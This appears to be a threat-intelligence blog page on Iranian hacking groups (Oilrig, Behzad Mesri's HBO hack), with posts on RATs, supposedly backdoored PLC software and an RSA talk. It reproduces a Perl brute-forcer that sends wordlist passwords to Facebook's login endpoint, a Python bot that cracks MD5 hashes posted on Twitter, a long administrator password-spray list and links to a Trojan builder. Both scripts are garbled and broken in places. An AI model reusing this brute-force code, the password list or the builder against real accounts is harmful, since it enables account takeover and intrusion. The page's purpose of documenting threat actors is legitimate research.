Confuser and Oilrig – Iranian Hacks

This is a bit disjointed at this time and is raw data. This is not intelligence, has not been analyzed but does tie directly to Oilrig.

A powerful program to pack your apps. With this program, you can pack programs in C # and VB.Net

Confuser – Confuser program zipped. For download and analysis

a1ir3z4-HK Frequently found on,, formerly of the Kalli Hack Team (kallihack),

Others in the mix: XVII_Hacker, #XVII_Roman & #BlackErroR1 & #sorblack


Bitcoin Cracker Performance Test via Telegram: @ a1ir3z4HK @ a1ir3z4_HK_bot
Using temp emails here:
Sprinkle the effort with a bit of Russian for flavoring

Cʏʙᴇʀ Cʀᴀᴄᴋɪɴɢ | سایبر کرکینگ\administrator;1qaz@WSX3edc\administrator;1qaz@WSX3edc\administrator;1qaz@WSX3edc\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;123qwe!@#\administrator;123qwe!@#\administrator;1234qwer!@#$\administrator;1qaz!QAZ\administrator;1qaz!QAZ\administrator;1qaz!QAZ\administrator;1qazXSW@\administrator;1qazXSW@\administrator;1qazXSW@\administrator;!QAZ2wsx\administrator;!QAZ2wsxЧитать полностью…\administrator;1qaz@WSX3edc\administrator;1qaz@WSX3edc\administrator;1qaz@WSX3edc\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;1qaz@WSX\administrator;123qwe!@#\administrator;123qwe!@#\administrator;1234qwer!@#$\administrator;1qaz!QAZ\administrator;1qaz!QAZ\administrator;1qaz!QAZ\administrator;1qazXSW@\administrator;1qazXSW@\administrator;1qazXSW@\administrator;!QAZ2wsx\administrator;!QAZ2wsxЧитать полностью…\administrator;p@ssw0rd\administrator;Pass@word1\administrator;P@ssw0rd\administrator;P@ssw0rd\administrator;P@ssw0rd\administrator;P@ssw0rd\administrator;P@ssw0rd\administrator;P@ssw0rd\administrator;Admin@123\administrator;Admin@123\administrator;Admin@123\administrator;Admin@123\administrator;Admin@123\administrator;Admin123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;admin@123\administrator;Passw0rd1\administrator;password@123\administrator;password@123\administrator;password@123\administrator;P@ssw0rd@123\administrator;password@1234\administrator;abc@123\administrator;\administrator;\administrator;
Beast Trojan Builder – (change to .rar to unzip) Use at own risk.
Featured post

Iranian Hacking – Saudi Sites – Bruteforcing facebook zhacker

Music is horrendous – be warned



and the script:


use strict;
use Net::SSLeay::Handle;

if(!defined($ARGV[0] && $ARGV[1])) {

print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;37m Usage: perl $0 Email wordlist.txt\n\n\n\n\n\n\n\n\n”;
print “\033[1;31m ======================================================\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
print “\n”;
exit; }

my $user = $ARGV[0];
my $wordlist = $ARGV[1];

open (LIST, $wordlist) || die “\n[-] Can’t find/open $wordlist\n”;


print ” Version 2.32 \n”;
print “\033[1;32md88888b .d8b. .o88b. d88888b d8888b. .d88b. db dD d88888b d8888b. \n”;
print “88′ d8′ `8b d8P Y8 88′ 88 `8D .8P Y8. 88 ,8P’ 88′ 88 `8D \n”;
print “88ooo 88ooo88 8P 88ooooo 88oooY’ 88 88 88,8P 88ooooo 88oobY’ \n”;
print “88~~~ 88~~~88 8b 88~~~~~ 88~~~b. 88 88 88`8b 88~~~~~ 88`8b \n”;
print “88 88 88 Y8b d8 88. 88 8D `8b d8′ 88 `88. 88. 88 `88. \n”;
print “YP YP YP `Y88P’ Y88888P Y8888P’ `Y88P’ YP YD Y88888P 88 YD \n”;

print “\033[1;31m ======================================================\n”;
print “\033[1;33m made by [[Z hacker]] \n”;
print “\033[1;31m ========================================================\n”;

print “\033[1;39m\n [+] Cracking Started on: $user …\n\n”;
print “=======================================\n”;

while (my $password = <LIST>) {
chomp ($password);
$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf “%%%0x”, ord $1 /eg;

my $a = “POST /login.php HTTP/1.1”;
my $b = “Host:”;
my $c = “Connection: close”;
my $e = “Cache-Control: max-age=0”;
my $f = “Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”;
my $g = “Origin:;;
my $h = “User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31”;
my $i = “Content-Type: application/x-www-form-urlencoded”;
my $j = “Accept-Encoding: gzip,deflate,sdch”;
my $k = “Accept-Language: en-US,en;q=0.8”;
my $l = “Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3”;

my $cookie = “cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa”;
my $post = “lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In”;
my $cl = length($post);
my $d = “Content-Length: $cl”;


my ($host, $port) = (“”, 443);

tie(*SSL, “Net::SSLeay::Handle”, $host, $port);

print SSL “$a\n”;
print SSL “$b\n”;
print SSL “$c\n”;
print SSL “$d\n”;
print SSL “$e\n”;
print SSL “$f\n”;
print SSL “$g\n”;
print SSL “$h\n”;
print SSL “$i\n”;
print SSL “$j\n”;
print SSL “$k\n”;
print SSL “$l\n”;
print SSL “$cookie\n\n”;

print SSL “$post\n”;

my $success;
while(my $result = <SSL>){
if($result =~ /Location(.*?)/){
$success = $1;
if (!defined $success)
print “\033[1;31m[-] $password -> Failed \n”;
close SSL;
print “\033[1;32m\n########################################################\n”;
print “[+] \033[1;32mPassword Cracked: $password\n”;
print “\033[1;32m########################################################\n\n”;
close SSL;

Rinlogger Teaching


Featured post

Treadstone 71 Selected to Deliver at the RSA Conference 2018 San Francisco

Foundations for a Strong Intelligence Program
April 18, 9AM-11AM RSA Conference
This Lab will explore key aspects of building a strong and long-lasting cyberthreat intelligence program. We’ll review methods of threat intelligence platform selection and bake-off techniques as well as cover stakeholder analysis and priority intelligence requirements. Additionally, we’ll practice collection planning and mission management as well as how to establish effective reporting and dissemination capabilities.

Cyber CounterIntelligence – Deception, Distortion, Dishonesty
April 18, 1:45PM-2:30PM RSA Conference
Deception, distortion, dishonesty are core to social media postings. Our adversaries use these methods concocting stories that create illusions that are meant to leave us divided. The talk will cover methods of countering their messaging while applying these tactics to protect your own organization and brand. Moving from intelligence to counterintelligence is the natural next step in our evolution.

Featured post

Plague of the Cyber RATS

How a toxic computer code delivered by ‘Remote Access Trojans’ is an invisible army able to take over a petrochemical plant and blow it to pieces

Ironically, said Bardin, it was Stuxnet that led Iran to enhance its offensive capability: ‘If Stuxnet had happened to the US or UK, it would have been seen as an act of war. In Iran, it made them invest heavily in offensive cyber operations.’

He revealed that 18 per cent of Iranian university students are studying computer science – a cyber warfare talent pool.

No guns. No bombs. No conventional weapons of any kind. An invisible army able take over a petrochemical plant like this and blow it to pieces. That’s the power of a toxic computer code delivered by RATs – ‘Remote Access Trojans’ – that’s making UK security experts VERY nervous indeed

‘Fixing this takes political will, and business is always pushing back, because good cyber security adds costs,’ said Bardin. ‘Ultimately, something is going to blow up.’

Featured post

Dragonfly 2.0? Delta Elektroniks and Pre-embedded Malware

Delta Elektroniks highly likely supported by the Russian government and a direct threat to energy sector supply chain operations

Treadstone 71 asserts with high confidence that Delta Elektroniks (DE) is likely a front company directly associated with Energetic Bear (Dragonfly). The equipment purchased from DE is vulnerable to supply chain threats due to malware embedded in the Taiwanese Delta Electronics (T-DE) programmable logic controller (PLC) software. T-DE is not aware of the infections allowing customers to download and install infected PLC software for the initial purposes of cyber espionage. Long-term intentions include possible physical sabotage operations and the potential to manipulate markets through false accidents (real but not due to human error or technology failure) to artificially drive up stocks (or down). Speculation of oil prices targeted to drive revenue when the price per barrel is too low to sustain economic plans. The PLCs appear to be genuine production parts with malware introduced post-production. Verification of Oleg Vladimirovich Strekozov’s identity is incomplete; the name is likely fictitious and probably state-sponsored. Evidence that suggests this outcome:

+++++++++++++++++++++++UPDATE+++++++++++++++++++ 1/4/2018+++++++++

Purely a Treadstone 71 effort


Malware Targets SCADA Devices

  • TTPs are like Dragonfly (Strekozov as defined) or Energetic Bear (B2)
  • Targeting SCADA devices is consistent with espionage practices (B2)
    • Provides hackers a foothold into US critical infrastructure via trusted downloads – Delta Website in Taiwan (as one of many)
  • A copycat website in Russia is suspicious and consistent with masquerade techniques (C3)
  • A legitimate Russian business would not conduct themselves in such a way (C2)
  • Multiple other sites deliver the same software (C3) …

NOTE: It is possible that the T-DE PLC software is poorly written and vulnerable by default. Scans from the T-DE website indicate website vulnerabilities including SQL injection weaknesses.

The full report: Treadstone 71Intelligence Games in the Power Grid PDF

The associated PPTX: Treadstone 71 Intelligence Games in the Power Grid

Our defenses are built for outside in. This is already in. Anti-virus scanners do not detect any of this only sandbox analysis. ‘Trusted’ software is being downloaded from multiple different sites in multiple different languages covering multiple different industries. Data centers, buildings, power plants, hospitals, public safety, dams, nuclear facilities, financial services data centers, oil pipelines, military facilities, hotels, industrial automation, building automation, energy and ICT infrastructure, embedded power, automotive electronics (ships/boats), embedded power, various components thereof, merchant and mobile power, telecom energy, and renewable energy non-inclusively.

Recent reports from Symantec (outside in): RELEASED OCTOBER 20/21

Twitter Brute Force – Iranian hack

Iranian password cracking for twitter – within the last 72 hours


#!/usr/bin/env python


# Password cracking twitter V 1.0 #

# #

# : # # #


import os

import time

import twitter

import json

import random

from datetime import datetime

from hashlookup.LookupTable import LookupTable





POLL = 60

WORDLIST = ‘./crackstation-dist/crackstation.txt’

W = “\033[0m” # default/white

R = “\033[31m” # red

P = “\033[35m” # purple

C = “\033[36m” # cyan

bold = “\033[1m”

INFO = bold + C + “[*] ” + W

WARN = bold + R + “[!] ” + W

MONEY = bold + P + “[$] ” + W

TIME = lambda: str(‘ ‘)[1].split(‘.’)[0]

print INFO+”%s: Logging into Twitter API …” % TIME()

api = twitter.Api(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET, access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET)

indexes = {

‘md5’: ‘./crackstation-dist/crackstation-md5.idx’,


if os.path.exists(‘processed.pkl’):

with open(‘processed.pkl’, ‘r’) as fp:

processed = json.loads(

print INFO+”%s: Loaded %d processed IDs” % (TIME(), len(processed))


processed = []

def crack_hashes(algorithm, hashes):

results = []

if 0 < len(hashes):

lookup_table = LookupTable(





results = lookup_table[hashes]

return results

def process_request(mention):

hashes = filter(lambda word: len(word) == 32, mention.text.split(‘ ‘))

if len(hashes):

print INFO+”%s: Canidate hashes: %s” % (TIME(), hashes)

results = crack_hashes(‘md5’, hashes[0]) # Limit one hash atm

if results[hashes[0]] is not None:

message = “@%s I cracked your hash, the password is ‘%s'” % (

mention.user.screen_name, results[hashes[0]]



message = “Sorry @%s but I couldn’t crack that hash :(” % mention.user.screen_name


print WARN+”%s: No hashes found in request.” % TIME()

message = None

if message:

print INFO + “%s: Posting update \”%s\”” % (TIME(), message)

message += ” (%d)” % random.randint(0, 9999)


def poll_twitter():

mentions = filter(lambda m: not in processed, api.GetMentions())

print INFO + “%s: %d new mention(s) to process” % (TIME(), len(mentions))

for mention in mentions:



def run_forever():

while True:


print INFO + “%s: Polling twitter API …” % TIME()



except twitter.TwitterError as error:

print WARN+”%s: Error from API %s, sleeping for 5mins” % (TIME(), str(error))

if __name__ == ‘__main__’:



except KeyboardInterrupt:

with open(‘processed.pkl’, ‘wb’) as fp:

fp.write(“%s” % json.dumps(processed))

print INFO+”%s: Saved processed to processed.pkl” % TIME()



Featured post

Behzad Mesri – #HBO Hack – Silent Terror

البته سوال اصلی من از همون اول که این دیفیسر رو میشناختم
این بود که چرا اسمش یه o کم داره
skote vahshat – 

BehzadMasri – skote_vahshat Get the scoop here (PDF)

بهزاد مصری

فکر کنم اول اشتباه نوشته و همون معروف شده و توی رو در بایستی مونده

Wired Article
حالا امیدوارم که زندگیش خراب نشه، ولی کاش مقامات به این سوال هم پاسخ میدادن


این لاگ ها و پیست ها و دیتابیس هایی که توی فروم های زیرزمینی تبادل میشن رو احتمالن دیدید
هیچ امنیت و پرایوسی ای باقی نمونده و قطعن یکی از مشتریان اینها، یا حتا عامل لیک شدنشون خود سازمان های دولتی و امنیتی هستند
چندان عجیب نیست که یک نفر به این شکل مشخصاتش لو میره…
یعنی واقعن هم خیلی کار سختی نیست، با یه سیستم شخصی هم میشه مشابهش رو انجام داد، دیگه دولت که خیلی دستش بازتره


اونی که مرتکب یک جرم سایبری بزرگ میشه و لو نمیره یا لو میره ولی پیدا نمیشه خیلی کارش درسته…
واقعن کار سختیه… یعنی دائم باید از دید اونی که می خواد پیداش بکنه به موضوع نگاه بکنه و این از کاری که مرتکبش میشه هم مهم تر و شاید سخت تره

سکات وشات


ا📌 طلاعات تکمیلی در مورد بهزاد مصری و هک HBO

🔹 کشف حمله سایبری زمانی که Time Warner کمپانی پدر HBO در حال خریده شدن توسط AT&T به مبلغ ۸۵ میلیارد دلار بوده است، اتفاق افتاد. این کشف سهام اچ بی او را کاهش داد.

‼️ مصری ظاهرا نمایشنامه قسمت های ساخته نشده سریال های اچ بی او را نیز سرقت کرده است.

🔹 از سوابق مصرف هک کردن زیرساخت‌های انرژی اتمی اسرائیل می باشد.

🔹۷ اتهام مصری شامل «جرایم رایانه‌ای»، «جرایم مالی»، «اخاذی»، «سرقت هویت» و دیگر جرایم است. باور مقامات آمریکایی این است که وی در حال حاضر در ایران سکونت دارد.

🔹 متن ایمیلی که مصری به هک شدگان فرستاده شامل عبارت زیر بوده است:

“Hi to All losers! Yes it’s true! HBO is hacked!”


🔹 مصری با نام مستعار Skote Vahshat حداقل ده اکسپلویت از نوع SQL Injection ثبت کرده، و ده ها سایت را دیفیس کرده است.

🔹 بر اساس ادعای مصری، وی بیش از ۱.۵ ترابایت داده به سرقت برده است.

🔴 گروه هکری OurMine کنترل حساب توییتر HBO را در شهریور ماه گرفتند. به نظر میرسد رمز این حساب توسط مصری به آنها منتقل شده است.

🔴 یکی از دلایل متهم شدن سریع مصری، تلاش وی برای تماس با خبرنگاران و رسانه های متعدد جهت تحت فشار گذاشتن اچ بی او برای پرداخت مبلغ اخاذی بوده است.

🔹 اولین اقدام مصری یافتن دسترسی از راه دور کارکنان به شبکه اچ بی او بوده که بتواند از همان طریق دسترسی خود به زیرساخت را حفظ نماید.

Featured post

Blog at

Up ↑

%d bloggers like this: